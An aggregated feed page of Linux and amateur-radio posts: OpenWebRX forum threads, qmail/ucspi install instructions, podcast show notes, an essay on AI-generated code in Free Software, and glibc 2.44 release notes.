Modalità di lettura

Feature request: RF bandwidth setting per SDR profile

Hello,

is this the right place to post feature requests?

I have a new PlutoSky R2 (AD9361) and noticed that when switching between OpenWebRX profiles with different sample rates, the AD9361 rf_bandwidth setting does not change.

It would be useful to have an RF bandwidth setting per profile, similar to the sample rate setting.

For example:

  • 1 MS/s profile → 1 MHz RF bandwidth
  • 4 MS/s profile → 4 MHz RF bandwidth
  • 10 MS/s profile → 10 MHz RF bandwidth

Currently, if rf_bandwidth is set to 1 MHz and I switch to a 4 MS/s profile, it remains at 1 MHz, so the analog RX bandwidth is much narrower than the sampled spectrum.

Ideally, the profile could contain a configurable rf_bandwidth value which is passed to SoapySDR using setBandwidth().

For example, on the AD9361 the current RX RF bandwidth can be read with:

 
iio_attr -u ip:192.168.20.70 -i -c ad9361-phy voltage0 rf_bandwidth
 

and it can be changed independently of the sample rate, for example:

 
iio_attr -u ip:192.168.20.70 -i -c ad9361-phy voltage0 rf_bandwidth 4000000
 

This would set the RF bandwidth to 4 MHz, which would be useful for an OpenWebRX profile using a 4 MS/s sample rate.

The AD9361 in my PlutoSky R2 supports RX RF bandwidth values up to 56 MHz.

Thanks!



  •  

ucspi-tcp6

ucspi-tcp6 è una derivaziorne del programma di Daniel Bernsteins ucspi-tcp 0.88, che aggiunge, tra le altre cose, le funzionalità ipv6 al programma originale ucspi-tcp. tcpserver e tcpclient sono strumenti di facile utilizzo dalla linea di comando per costruire applicazioni client-server TCP.

A partire dalla versione 1.13.05 è richiesto il pacchetto mandoc sia per ucspi-tcp6 che per ucspi-ssl. Gli utenti Slackware possono trovare il pacchetto su slackbuild.org.

Installare ucspi-tcp6

TCP6_VER=1.13.08
cd /var/qmail/ 
wget https://www.fehcom.de/ipnet/ucspi-tcp6/ucspi-tcp6-${TCP6_VER}.tgz 
tar xzf ucspi-tcp6-${TCP6_VER}.tgz 
cd net/ucspi-tcp6-${TCP6_VER}/ 
./package/install

L'utilizzo di tcpserver, per quanto riguarda l'IPv4, è del tutto simile a quello del programma originale di Bernstein.

Upgrade

In caso di upgrade di ucspi-tcp6 è necessario uccidere i processi tcpserver e riavviare qmail (qmailctl sarà installato dopo):

qmailctl reboot
  •  

ucspi-ssl - TLS encryption per comunicazioni Client/Server IPv6/IPv4

sslserver, sslclient, e sslhandle sono strumenti da utilizzare dalla linea di comando per costruire applicazioni SSL client-server. 

sslserver ascolta connessioni su IPv6 e/o IPv4, e lancia un programma per ogni connessione accettata. L'ambiente del programma include variabili che mantengono l'host name locale e remoto, l'indirizzo IP, e i numeri di porta.

sslclient richiede una connessione o a tramite IPv6 o IPv4 TCP sockets, e lancia un programma. L'ambiente del programma environment include le stesse variabili di sslserver.

Mediante sslserver è possibile accettare connessioni sicure per spedire la posta attraverso la porta 465 previa autenticazione.

Abbiamo già installato le fehQlibs, che sono delle librerie C supplementari necessarie anche per ucspi-ssl.

A partire dalla versione 1.13.05 è richiesto il pacchetto mandoc sia per ucspi-tcp6 che per ucspi-ssl. Gli utenti Slackware possono trovare il pacchetto su slackbuild.org.

UCSPISSL_VER=0.13.08
cd /var/qmail 
wget https://www.fehcom.de/ipnet/ucspi-ssl/ucspi-ssl-${UCSPISSL_VER}.tgz
tar xzf ucspi-ssl-${UCSPISSL_VER}.tgz 
cd host/superscript.com/net/ucspi-ssl-${UCSPISSL_VER}
./package/install

La configurazione degli script supervise per qmail-smtps è all'interno della pagina riguardante la configurazione.

Gli utenti NetBSD, prima di compilare, dovrebbero fare le seguenti correzioni:

  • rimuovere l'opzione -ldl da compile/ssl.lib
  • aprire conf-man e mettere l'indirizzo del man usr/share/man nella prima riga (è nella seconda riga e così non viene trovato)

Aggiornare ucspi-ssl

In caso di aggiornamento di ucspi-ssl è necessario uccidere i processi sslserver e riavviare qmail. Se si è aggiornato anche ucspi-tcp6, questo comando sarà sufficiente (qmailctl sarà installato dopo):

qmailctl reboot
  •  

Installare un certificato Let's Encrypt per i server qmail e dovecot

Changelog

  • 25 luglio 2026 (v. 4.0) Script hook e documentazione sottostante completamente revisionati.
    - Aggiunto un nuovo script wrapper dehydrated-renew per eseguire il rinnovo del certificato e la sincronizzazione del servizio per SNI solo quando uno o più certificati sono effettivamente cambiati.
    - Introdotto un meccanismo di flag di modifica (dehydrated.changed) per evitare ricaricamenti e riavvii non necessari del servizio se un certificato è stato effettivamente distribuito.
    - Consolidate le operazioni post-rinnovo nella nuova funzione cert_sync(), fornendo un unico punto di ingresso per la sincronizzazione della configurazione dei certificati di qmail, Dovecot e Apache dopo i rinnovi riusciti. La stessa funzione cert_sync() può essere chiamata tramite uno script autonomo, che non coinvolge l'esecuzione di dehydrated. Ridotte le interruzioni non necessarie del servizio eseguendo la sincronizzazione una volta per ogni ciclo di rinnovo anziché una volta per ogni certificato rinnovato.
    - Il certificato qmail viene creato solo se è impostato MAKE_MAIL_CERTS=1. Se MAKE_MAIL_CERTS=0, lo script hook distribuisce solo i certificati (da utilizzare per il server web).
    - Le funzionalità Server Name Indication (SNI) per qmail e dovecot possono essere disabilitate impostando ENABLE_SNI=0 (impostazione predefinita).
    - Le voci ServerName e ServerAlias ​​per Apache e i domini SNI possono essere impostate facoltativamente con ENABLE_APACHE_SNI_CONF=1.

To enable HTTPS on your website, you need to get a certificate (a type of file) from a Certificate Authority (CA). Let’s Encrypt is a CA. In order to get a certificate for your website’s domain from Let’s Encrypt, you have to demonstrate control over the domain. With Let’s Encrypt, you do this using software that uses the ACME protocol which typically runs on your web host.

  •  

2.5 Admins 311: Couch Cushions

Microsoft restored an account including files that it initially claimed wasn’t possible, Apple might lock down phones if people don’t keep up their lease payments, ZFS scrubs shouldn’t be painful, and accessing another network from a locked-down work machine.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

ZFS vs Ceph: Do You Actually Need Ceph?

 

News/discussion

Microsoft restores player’s 25-year-old account following widespread backlash

iOS 27 code suggests Apple could restrict leased devices after missed payments

If Scrubs Hurt, Your ZFS Design Is Broken

 

Free consulting

We were asked about accessing another network from a locked-down work machine.

 

Teleport Community

Apache Guacamole®

Linux After Dark – Episode 120

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

Re: [new] Improved OpenWebRX Packages Available

The new OpenWebRX+ 1.2.120, available from the repository, adds bubble display of bookmarks, as they get selected, as well as improvements to APRS reporting. See below for all changes.
 
- Added bookmark info bubbles when clicked.
- Fixed reporting third party APRS packets.
- Disabled reporting non-reportable APRS packets.
- Fixed typo in APRS "adressee" name.
- Stripped whitespace from APRS addressee.
 
Bookmark-Bubbles.png
 
PS: Short cheat sheet for people who just cannot get things to work:

1) If it does not work for you, reload OpenWebRX page while holding the SHIFT key.
2) If it does not work for you, check "Settings | Feature report" page to see what you are missing.
3) If it does not work for you, wait for a day or two, maybe it starts working or you figure it out.
4) If it does not work for you, create a separate forum thread and explain your problem there. Attach the logs, obtained with "sudo journalctl -u openwebrx". Do not paste the entire log into the message, attach it as a file instead.

  •  

Re: Background decoding - interesting problem

Background decoding, when enabled, will automatically decode anything that is available, that means: anything that is registered in the bandplan, is enabled, and is available on a currently running profile.
 
I suppose your device is decoding on profiles that are being used by clients, or you have the "keep device running at all time" option checked, in which case it will just continue decoding on the last profile used on the device. The schedule is a feature that will take control of the device if no clients are using the device any more, it just gives you more control over what the device should do while idle.
 
PSKreporter on the other hand has its own configuration, where it can be en- or disabled separately.
  •  

Proton sta sviluppando un browser web (basato su Chromium)

Proton sta lavorando a un proprio browser web. L’azienda svizzera famosa per i suoi prodotti Proton VPN e Proton Mail, è alla ricerca di sviluppatori per creare un browser incentrato sulla tutela della privacy degli utenti. A rivelarlo è un annuncio di lavoro comparso sul sito di Proton nel quale si cerca un ingegnere software […]

L'articolo Proton sta sviluppando un browser web (basato su Chromium) proviene da Marco's Box.

  •  

Background decoding - interesting problem

Hello. I have a very interesting issue regarding background decoding. After selecting the "Enable background decoding services" option, the server immediately begins decoding WSPR (which is the only mode I have selected) and sending spots to PSKReporter simultaneously on the 40m and 20m bands. What makes this particularly interesting is that my SDR profiles do not have the "Run background services on this device" option enabled, nor do I have a "Scheduler" configured. Decoding starts immediately upon checking the "Enable background..." option. I cannot understand why it specifically targets the 20m and 40m bands, or why it begins decoding and spotting straight away. I have three devices plugged to RPi4: one RTL and two Sdrplay's. The RTL profile covers only VHF/UHF; the first Sdrplay (RSP1) has profiles: 160m, 80/60m, 40m, 30m, ..., 6m; and the second Sdrplay (RSPa1) has profiles for 20m, 15m, and 10m. It is worth noting that the first profile on the RSP1 is 160m, while the first profile on the RSPa1 is 20m. The server is not open in a web browser. Thanks for any opinions and help to understand this ironically issue.
 
73
Arek
  •  

Il sintetizzatore software Xfer Serum 2 sbarca su Linux

Xfer, creatrice dei popolari sintetizzatori software VST Serum e Serum 2, ha pubblicato sul proprio forum una beta per Linux. Per chi produce musica al computer è un’ottima notizia: questo plugin non ha mai funzionato in modo affidabile con Wine/Yabridge ed è spesso indicato come uno dei motivi per cui molti evitano di passare a […]

L'articolo Il sintetizzatore software Xfer Serum 2 sbarca su Linux proviene da Marco's Box.

  •  

In the news: New Linux Flaw Lets Attackers Escape VMs; Three Lines of Code…

In the news: New Linux Flaw Lets Attackers Escape VMs; Three Lines of Code Improve Linux Storage Performance; AUR Hit Again with Malicious Packages; Alpine Linux 3.24 Features Fresh Desktops and a Newer Kernel; EU Open Source Strategy Plays Key Role in Tech Sovereignty Package; Linux Foundation Report Indicates AI Driving Tech Hiring; and United Nations Open Source Portal Goes Live.

  •  

FLUG - Riunioni Linux Day 2026

Abbiamo deciso di fissare delle riunioni ricorrenti per organizzare il Linux Day insieme all'ElsaGLUG, il sabato pomeriggio alle 16:30. Le riunioni si svolgeranno da remoto, mediante sistemi di comunicazione rigorosamente di software libero, e sarà nostra premura non prolungarne la durata oltre l'ora. Scriveteci in privato per partecipare alle riunioni. I resoconti delle riunioni verranno ...
  •  

Re: DX PATROL MK4.

Thanks for the reply. I had an issue with the PPM setting that needed adjustment. I also need to find a solution for the high gain. I added a blacklist entry that frees up the receiver, decoupling it from the DVB-T receiver.
  •  

Re: DX PATROL MK4.

Geia sou Giorgo,

It looks like you need to blacklist some modules.

First create the following file (copy past from sudo all the way to last EOF)

sudo tee /etc/modprobe.d/exclusions-rtl2832.conf <<EOF
# Blacklist host from loading modules for RTL-SDRs to ensure they
# are left available for the Docker guest.

blacklist dvb_core
blacklist dvb_usb_rtl2832u
blacklist dvb_usb_rtl28xxu
blacklist dvb_usb_v2
blacklist r820t
blacklist rtl2830
blacklist rtl2832
blacklist rtl2832_sdr
blacklist rtl2838

install dvb_core /bin/false
install dvb_usb_rtl2832u /bin/false
install dvb_usb_rtl28xxu /bin/false
install dvb_usb_v2 /bin/false
install r820t /bin/false
install rtl2830 /bin/false
install rtl2832 /bin/false
install rtl2832_sdr /bin/false
install rtl2838 /bin/false
EOF

Then do also the following

sudo modprobe -r dvb_core
sudo modprobe -r dvb_usb_rtl2832u
sudo modprobe -r dvb_usb_rtl28xxu
sudo modprobe -r dvb_usb_v2
sudo modprobe -r r820t
sudo modprobe -r rtl2830
sudo modprobe -r rtl2832
sudo modprobe -r rtl2832_sdr
sudo modprobe -r rtl2838

then..
sudo depmod -a

After that I would reboot the raspi and hopefully all will be ok.

-Yiannis
  •  

Greg Casamento: Open Source Is Hobbling Itself Over Generative AI

 


The answer to bad AI-assisted contributions is not a purity test. It is better engineering discipline.

Earlier this year, a discussion in the GNUstep community raised a proposal that will sound familiar across the Free Software world: prohibit AI-generated code in core projects and proudly advertise the result as “coded by humans” or “AI-free.” The argument was not frivolous. Generative AI raises real questions about copyright, attribution, security, energy use, labor, trust, and the flood of low-quality patches that maintainers are increasingly being asked to review.

But a blanket refusal to use generative AI is the wrong response. It does not solve the hardest problems. It creates rules that are nearly impossible to define or enforce, confuses the method of production with the quality of the product, and risks turning Free Software into a movement that protects yesterday’s workflow instead of protecting software freedom.

Open Source and Free Software are already operating with too few maintainers, too much technical debt, and too many important projects resting on the unpaid labor of a handful of people. We should be very careful about categorically rejecting tools that might help contributors understand old code, write tests, improve documentation, port software, find defects, or perform mechanical modernization. We should be even more careful when our proposed alternative offers the appearance of trust without the substance of it.

The better principle is straightforward:

Regulate the code, not the development process.

“AI-generated” is not a workable boundary

What exactly counts as AI-generated code?

Is it a complete function produced from a prompt? A line accepted from an AI-powered autocomplete system? A compiler-suggested correction? An automated refactoring? A test generated from an existing implementation? A translation of documentation? A patch written by a human after asking a model to explain an unfamiliar API? What if the developer uses AI to identify the problem but writes every line manually? What if an IDE quietly includes machine-learning features the contributor never explicitly invoked?

The line between “human-written” and “AI-assisted” is already blurred, and it will become less distinct as generative features are embedded in editors, compilers, debuggers, search engines, and operating systems. A ban that cannot draw a stable boundary will be applied inconsistently. Honest contributors will disclose and be penalized; dishonest contributors will simply omit the disclosure. Others may be falsely accused because their code “looks generated.”

An “AI-free” badge therefore risks promising something a project cannot reliably prove. Free Software should be especially suspicious of unverifiable labels.

The risks are real—and they argue for review

None of this means generated code should be trusted.

Research has found substantial security weaknesses in AI-produced code. One empirical study of Copilot snippets found security problems in roughly 30 percent of Python snippets and 24 percent of JavaScript snippets in its later dataset. Other research has demonstrated that code models can memorize portions of their training data, while studies of license compliance have found that models often provide inaccurate licensing information, particularly for copyleft code. Those are serious concerns, not anti-AI superstition. (Security weaknesses study; memorization study; license-compliance study)

The productivity story is also more complicated than the advertising. GitHub reported that developers completed a controlled programming task considerably faster with Copilot, but a later randomized study of experienced Open Source developers working in their own repositories found that the tools available in early 2025 made them 19 percent slower. METR’s 2026 follow-up found suggestive but still statistically uncertain evidence of improvement with newer tools. AI is neither magic nor uniformly useless; its value depends on the person, task, model, and workflow. (GitHub productivity study; METR 2025 study; METR 2026 update)

But human authorship has never guaranteed secure, original, maintainable, or correctly licensed code. That is why healthy projects require tests, review, contributor certification, licensing rules, and maintainers who can reject bad work. The origin of a patch may affect how carefully we inspect it, but it cannot replace inspection.

If a contributor submits code they do not understand, the contribution should be rejected. If the patch fails tests, violates project style, invents APIs, introduces vulnerabilities, obscures provenance, or imposes an unreasonable review burden, it should be rejected. That is true whether the patch was produced by Claude, Copilot, a Stack Overflow answer, a contractor, a junior programmer, or a senior maintainer having a bad afternoon.

The repository contains code, not virtue.

Review capacity is the scarce resource

Maintainers have a legitimate complaint: AI can make producing a patch far cheaper than reviewing one. A person can generate thousands of lines in minutes and then expect a volunteer to spend hours establishing whether any of it is correct. That asymmetry can become a denial-of-service attack on a project even when the submitter means well.

The answer, however, is not necessarily to ban a tool. It is to place the cost and responsibility back on the contributor.

A project can require that contributors:

  • disclose material use of generative AI;

  • identify the tool and describe how it was used;

  • certify that they reviewed and understand every submitted change;

  • explain the design and answer maintainer questions without outsourcing the conversation to a model;

  • provide focused tests and evidence that the patch solves a real problem;

  • comply with the project’s licensing and provenance requirements;

  • keep changes small enough to review; and

  • accept that unexplained, low-signal, or mass-generated submissions may be closed without detailed triage.

Disclosure is imperfect, but it establishes a community norm and makes an honest contributor accountable. Research into self-declaration practices has already found developers using everything from a simple disclosure to records of prompts, explanations, and quality checks. Projects can choose a level proportionate to their risk. (Study of AI-code self-declaration)

This approach is stricter than either blind enthusiasm or symbolic prohibition. It does not say, “AI wrote it, so it must be acceptable.” It says, “You submitted it, so you are responsible for it.”

Freedom is not a reenactment of an older toolchain

Free Software is founded on the user’s freedom to run, study, modify, and share software. Those principles describe control over technology; they do not require that every developer use the same approved method to create it. The Open Source Initiative’s work on an Open Source AI Definition likewise frames the issue around the practical freedoms to use, study, modify, and share systems—not around preserving a pre-AI development ritual. (Open Source AI Definition 1.0)

There are valid reasons for preferring Free or locally operated AI tools over proprietary cloud services. A project may reasonably prohibit contributors from uploading confidential material or unreleased security fixes to third-party systems. It may impose stricter provenance requirements in sensitive components. Individual maintainers may decline to review bulk-generated reports that have repeatedly produced noise. These are concrete policies tied to concrete harms.

What does not follow is that a project becomes more free merely because no contributor used a generative tool.

An “AI-free” identity may even distract from the qualities that users actually need: portability, stability, compatibility, security, good documentation, responsive maintenance, and code whose behavior can be understood and changed. A badge is not a substitute for those things.

Blanket refusal has an opportunity cost

Mature Free Software projects often contain decades of code and institutional knowledge. They need documentation, regression tests, API audits, build-system repairs, platform ports, translations, issue triage, and repetitive modernization. Generative AI will not perform those jobs reliably on its own. It can still help a knowledgeable contributor perform some of them.

Rejecting that possibility at the policy level has consequences. It may discourage younger contributors whose development environment already includes these tools. It may disadvantage people working in a second language or developers with disabilities who use AI as an accessibility aid. It may prevent experiments that would have failed harmlessly—or succeeded usefully—under ordinary review. Most dangerously, it can encourage a culture in which the declaration “human-written” is treated as evidence of quality.

Free Software has survived previous waves of automation. High-level languages, garbage collection, IDEs, graphical interface builders, code generators, automated formatters, static analyzers, and online code search all changed what it meant to “write” software. Each tool altered the division of labor between programmer and machine. The relevant question was never whether every token originated in a human mind. The question was whether people retained the freedom, knowledge, and responsibility needed to control the resulting system.

That remains the right question now.

A policy that protects projects without freezing them

A sensible policy can fit on one page:

  1. Disclosure: Contributors must disclose material AI assistance in the commit message or pull request.

  2. Responsibility: The named human contributor is the author of record and must understand, explain, test, and stand behind the entire submission.

  3. Quality: AI-assisted contributions receive the same requirements for correctness, security, maintainability, style, documentation, and test coverage as any other contribution.

  4. Provenance: Contributors must have a reasonable basis to believe the submission is license-compatible and must identify known sources or generated passages that may reproduce existing code.

  5. Data protection: Project secrets, embargoed vulnerabilities, private communications, and other restricted material may not be submitted to unauthorized external services.

  6. Reviewability: Maintainers may reject oversized, unexplained, repetitive, or low-signal submissions without performing free forensic work for the submitter.

  7. Local discretion: Components with unusual legal, safety, privacy, or reliability risks may adopt additional written restrictions.

This policy does not resolve every ethical question surrounding generative AI. No contribution policy can. It does, however, address the matters a software project can actually evaluate and enforce.

We should not surrender the future of software freedom

The Free Software community should remain one of the sharpest critics of concentrated corporate power, opaque models, exploitative data practices, environmental cost, and systems that deprive users of control. Criticism is part of our job. So is building an alternative.

If we define ourselves by refusing to touch an important new class of technology, proprietary vendors will shape that technology without us. If instead we insist on transparency, modifiability, privacy, local control, licensing clarity, and human accountability, we can bring the values of Free Software into the AI era.

We do not need to pretend that generative AI is trustworthy. We need processes that do not require us to trust it.

Judge the patch. Demand disclosure. Require understanding. Enforce licensing. Protect reviewers. Reject garbage.

But do not hobble Open Source and Free Software with a blanket ban that is difficult to define, impossible to verify, and disconnected from the quality of the code we ultimately ship.

  •  

Re: DX PATROL MK4.

Do you mean OpenWebRX+ 1.2.117 SD Card Image for 64bit Raspberry Pi ?
 
RasPi 3 probably doesn't have enough processing power, and although it has 64-bit ARM core with a 32-bit GPU, the usual RasPi OS is only 32-bit.
 
I'd suggest minimum RasPi 4 (or even better a 5) hardware, to be able to take full advantage of OWR+.
 
 
On Tue, Aug 4, 2026 at 05:26 AM, GEORGE-SV1GGY wrote:
  •  

DX PATROL MK4.

Good evening to the group. I have an RPi 3B and installed OpenWebRx from the official site (dated 11/10/2023), and it works very well. However, when I installed OpenWebRx version 1.2.117 from LZ2SSL, I get no VHF/UHF/HF reception at all. In the first instance, the system recognizes the SDR as an RTL-SDR, whereas in the second, it recognizes it as a DVB TV receiver. Does anyone have any idea what I should do? The waterfall display is blue, but there is no signal reception. All settings seem to work, yet there is no reception. Thanks in advance.
  •  

Late Night Linux – Episode 397

Initial Steam Machine reviews are broadly positive, Jellyfin is losing some key project leaders, Sony deletes more movies that people “bought”, why you probably shouldn’t wipe your phone when the US authorities ask for access, Graham repurposes some discarded crypto hardware to play arcade games, Félim gets that old game working, a great terminal music player, and more.

 

News

Steam Machine with SteamOS Linux – initial thoughts

Jellyfin Project Leadership Changes

Sony Deletes A Bunch More Movies From The Accounts Of People Who ‘Bought’ Them

US government targets Cop City protester over phone operating system

David Potter, the man who put Psion in the palm of your hand, logs off at 82

 

Discoveries

AMD BC250 Documentation

Cholo

kew

Screenshot of kew in action

 

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with some early episodes

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

Attacchi su AUR: Arch Linux blocca l’adozione dei pacchetti orfani

Misure straordinarie per la sicurezza su Arch Linux. Con un breve e perentorio comunicato inviato alla mailing list aur-general, Robin Candau (noto con l’alias Antiz, membro del DevOps team di Arch Linux) ha annunciato la sospensione temporanea della funzione di adozione dei pacchetti dismessi su AUR (Arch User Repository). La decisione è stata presa d’urgenza […]

L'articolo Attacchi su AUR: Arch Linux blocca l’adozione dei pacchetti orfani proviene da Marco's Box.

  •  

OrvietoLug - journalctl: leggere e analizzare i log di systemd

Scopri come usare journalctl per leggere, filtrare e analizzare i log di systemd. Guida pratica con esempi utili per amministratori Linux e utenti avanzati.

L'articolo journalctl: leggere e analizzare i log di systemd proviene da Orvieto Linux User Group | Promozione software libero a Orvieto.

...
  •  

Linux After Dark – Episode 127

We got a lot of feedback about choosing a distro for the friends and family we support, but a lot of suggestions didn’t make sense to us. We get into why we pick boring and safe choices instead of interesting and exciting ones.

 

 

 

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with some early episodes

 

 

 

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed.

  •  

2.5 Admins 310: GPLFreeBSD

Google wants you to use a selfie video for account recovery, LG will stop apps turning their smart TVs into residential proxy nodes, we disagree about how serious OpenAI’s agent hacking Hugging Face is, FreeBSD removes the last bits of GPL software and suffers an embarrassing git flub , and backing up to an encrypted NAS without ZFS.

 

Plug

Support us on patreon and get an ad-free RSS feed with some early episodes

 

News/discussion

Introducing selfie for sign-in: a new, easy way to access your Google Account

LG to Ban Residential Proxies from Smart TV Apps

OpenAI says its AI agent broke out of testing sandbox to hack Hugging Face

FreeBSD 16 Retires The Last Of Its GPL Code From Its Base System

Ports Repository Freeze

 

Free consulting

We were asked about backing up to an encrypted NAS without ZFS.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

Re: FreeDV Decoder not working on OpenWebRx+ 1.2.117

I am running openwebrx+ on my Debian box (AMD64) and I was able to compile the software into a .deb file, then install the deb.  I'm not related to the project at all, but I'll try to help if I can.  
 
At https://github.com/peterbmarks/radae_decoder  I followed the instructions under "Install dependencies (Debian/Ubuntu)".  I then followed the "quick build" under  "Debian Package for webrx_rade_decode" .
 
A .deb file was built, then I used dpkg to install it.
 
It installed a file /usr/bin/webrx_rade_decode
 
I restarted openwebrx+ and boom!  there were new modes listed as "RADEU" and "RADEL".  I tried using it a bit on what I thought were FreeDV signals and it did not seem to be working.  No sound.  But maybe the signal was too weak or somthing because as I was scanning the bands last night, I ran across the Tuesday night FreeDV net and it worked flawlessly.
 
I don't know what platform you're trying to run openwebrx+ on, but it looks like the RADE decoder page has good instructions for MAC also.  If on a Raspberry PI, then I'm guessing the Debian instructions MAY work on there.  I don't know.  I hope this is of some help.
 
  •  

Late Night Linux – Episode 396

With several open source figures taking a stance on either side of the generative AI debate, we have another argument about it. This time we actually come to something closer to an understanding of each other’s views, even if we still end up disagreeing.

 

News/discussion

Piss up at The Shipwrights Arms (just next to London Bridge station) on Saturday 5th September from 5pm until late

“Linux is not one of those anti-AI projects, and if somebody has issues with that, they can do the open-source thing and fork it”

Protecting our FLOSS commons from LLMs

General Resolution: LLM usage in Debian

 

 

 

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with some early episodes

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

libc @ Savannah: The GNU C Library version 2.44 is now available

The GNU C Library
=================

The GNU C Library version 2.44 is now available.

The GNU C Library is used as the C library in the GNU system and
in GNU/Linux systems, as well as many other systems that use Linux
as the kernel.

The GNU C Library is primarily designed to be a portable
and high performance C library.  It follows all relevant
standards including ISO C23 and POSIX.1-2024.  It is also
internationalized and has one of the most complete
internationalization interfaces known.

The GNU C Library website is at http://www.gnu. ... /software/libc/

Packages for the 2.44 release may be downloaded from:
        http://ftpmirr ... .gnu.org/libc/
        http://ftp.gn ... org/gnu/libc/

The mirror list is at http://www.gnu. ... /order/ftp.html

Distributions are encouraged to track the release/* branches
corresponding to the releases they are using.  The release
branches will be updated with conservative bug fixes and new
features while retaining backwards compatibility.

NEWS for version 2.44
=====================

Major new features:

  • System-wide tunables can be applied using /etc/tunables.conf and

  running ldconfig.  Specific tunable settings and the
  /etc/tunables.conf file format and path are not part of the stable
  library interfaces and may change between releases.

  • A new tunable, glibc.elf.thp, is added to map read-only segments with

  Transparent Huge Pages (THP) if THP is not disabled in the kernel.  When
  glibc.elf.thp is set to 1, malloc uses the actual kernel THP mode
  instead of defaulting to madvise mode and madvise_thp will stop issuing
  MADV_HUGEPAGE if kernel THP mode is always.

  • The THP page size in malloc is capped to MAX_THP_PAGESIZE.  If the THP

  page size is above MAX_THP_PAGESIZE, THP in malloc is disabled.

  • Additional optimized and correctly rounded mathematical functions have

  been imported from the CORE-MATH project, in particular cosh, sinh, and
  tanh.

  • Many additional improvements to existing functions have been synchronized

  from the CORE-MATH project.

  • For C++26, the assert macro is now variadic, allowing more complex

  arguments containing commas (which however still must evaluate to a single
  value).

  • The SVID error handling for cosh and sinh was moved to compatibility

  symbols, allowing improvements in performance.

  • Static PIE is now supported for arm-*-linux-gnueabi.  It requires toolchain

  support to correctly set the expected linker options.

  • On AArch64 targets that support the Guarded Control Stack extension all GCS

  operations (including status, write on shadow stack, and push to shadow
  stack) are locked after enabling GCS with ENFORCED or OVERRIDE GCS policy.
  When a GCS operation is locked, a program cannot change this operation
  status via the prctl syscall.  This prevents disabling or corrupting the
  GCS shadow stack during runtime.

  • On AArch64 targets, log, exp, sin, cas, sinh, cosh, asinh, acosh, atanh

  single and double precision special cases have been vectorized for SVE and
  AdvSIMD, and vector variants of powr have been added.

  • On RISC-V targets, vector extension optimized variants of memcmp, memccpy,

  memchr, memcpy, memmove, stpncpy, strcmp, strchr, strcpy, strncmp, strncpy,
  strlen, and strrchr have been added.

  • On PowerPC, memchr optimized for Power10 has been re-added.


  • Support for LoongArch32 has been added.


  • Pre-built ld.so.cache files can be installed with ldconfig.


  • A new locale has been added: hrx_BR (Hunsrik language spoken in Brazil).


Deprecated and removed features, and other changes affecting compatibility:

  • Although malloc and related functions currently return pointers

  aligned to alignof (max_align_t), the documentation now says future
  versions of glibc may relax alignment requirements for small allocations.
  For example, a future malloc(1) might return a pointer with odd
  alignment, because no object of size 1 can have a fundamental
  alignment greater than 1.

  • The s390-linux-gnu (31bit) configuration is no longer supported.


  • The --enable-memory-tagging configure option has been removed.

  The corresponding AArch64-specific functionality that was previously
  activated by this flag has been removed as well.

  • The --enable-static-nss configure option has been removed.  It had no

  effect on the build since the NSS reorganization in glibc 2.33; its only
  remaining behavior was to suppress the link-time warnings on the NSS
  interface functions in libc.a, which are now emitted unconditionally.

Security related changes:

The following CVEs were fixed in this release, details of which can be
found in the advisories directory of the release tarball:

  GLIBC-SA-2026-0005:
    gethostbyaddr and gethostbyaddr_r may incorrectly handle DNS
    response (CVE-2026-4437)

  GLIBC-SA-2026-0006:
    gethostbyaddr and gethostbyaddr_r return invalid DNS hostnames
    (CVE-2026-4438)

  GLIBC-SA-2026-0007:
    iconv crash due to assertion failure with untrusted input
    (CVE-2026-4046)

The following bugs were resolved with this release:

  [2363] libc: EOPNOTSUPP and ENOTSUP in errno.h must be different,
    according to SUSv3
  [3794] manual: iconv: TRANSLIT and IGNORE feature not documented
  [15792] dynamic-link: [arm] ARM dynamic linker should save/restore
    coprocessor registers
  [20331] libc: fts ignores errors from readdir()
  [20680] dynamic-link: ifunc resolver cannot access the thread pointer
    with static linking
  [22944] libc: fts cannot traverse paths which have a length longer
    than USHRT_MAX
  [25257] libc: sotruss: fix error message for '--f' argument
  [25770] locale: newlocale memory leak in LOCPATH parsing and on error
    paths
  [27582] libc: x86_64: IFUNC in static user programs may crash when
    built with -fstack-protector-all
  [28218] dynamic-link: ld.so: ifunc resolver calls a lazy PLT. When
    does it work?
  [28817] libc: static-pie ifunc resolver tls failure
  [28940] nss: __nss_database_get doesn't check for allocation failure
  [30136] manual: Please document behaviour of iconv(3) when input is
    untranslatable
  [30304] nptl: nptl/tst-pthread-gdb-attach test fails with new libc
    shared library version
  [30769] malloc: malloc_trim is not working correctly for arenas other
    than arena 0
  [30976] dynamic-link: rtld: resolve ifunc relocations after
    JUMP_SLOT/GLOB_DAT/etc
  [30992] libc: alpha: setrlimit() with negative values besides
    RLIM_INFINITY returns EPERM
  [31901] libc: elf/tst-glibc-hwcaps-prepend-cache fails on i686
  [33226] math: math-vector-fortran.h vs not ffast-math
  [33626] libc: execvpe should skip inaccessible $PATH components
  [33650] build: abilist.awk doesn't handle unversioned defined symbols
  [33785] stdio: New streams are linked into global list before they are
    fully initialized
  [33848] build: Build fails at openat2.h, redefinition of 'struct
    open_how'
  [33882] libc: Recursion in nftw() causes stack overflow(CWE-674)
  [33904] build: error: '__vasprintf_chk' undeclared here
  [33921] build: Building with Linux-7.0-rc1 errors on OPEN_TREE_CLONE
  [33935] stdio: _IO_wfile_doallocate not linked correctly when linking
    glibc statically
  [33980] locale: iconv: ibm139x trigger assertion error when converting
    to internal while lack enough room (CVE-2026-4046)
  [33985] build: ld: cannot find -lgcc_s: No such file or directory
  [33999] stdio: libio: potential dangling _IO_save_base or memory leak
    in wgenops.c
  [34006] stdio: libio: inconsistent fmemopen_write behavior on last \0
  [34008] stdio: stdio-common: scanf %mc pattern will cause heap
    overflow when width > 1024
  [34014] nss: gethostbyaddr and gethostbyaddr_r may incorrectly handle
    DNS response
  [34015] nss: gethostbyaddr and gethostbyaddr_r return invalid DNS
    hostnames
  [34019] stdio: libio: undefined behavior when setbuf on open_memstream
  [34033] network: resolv/ns_print.c: ns_sprintrrf TSIG path bypasses
    buflen and can overflow caller buffer
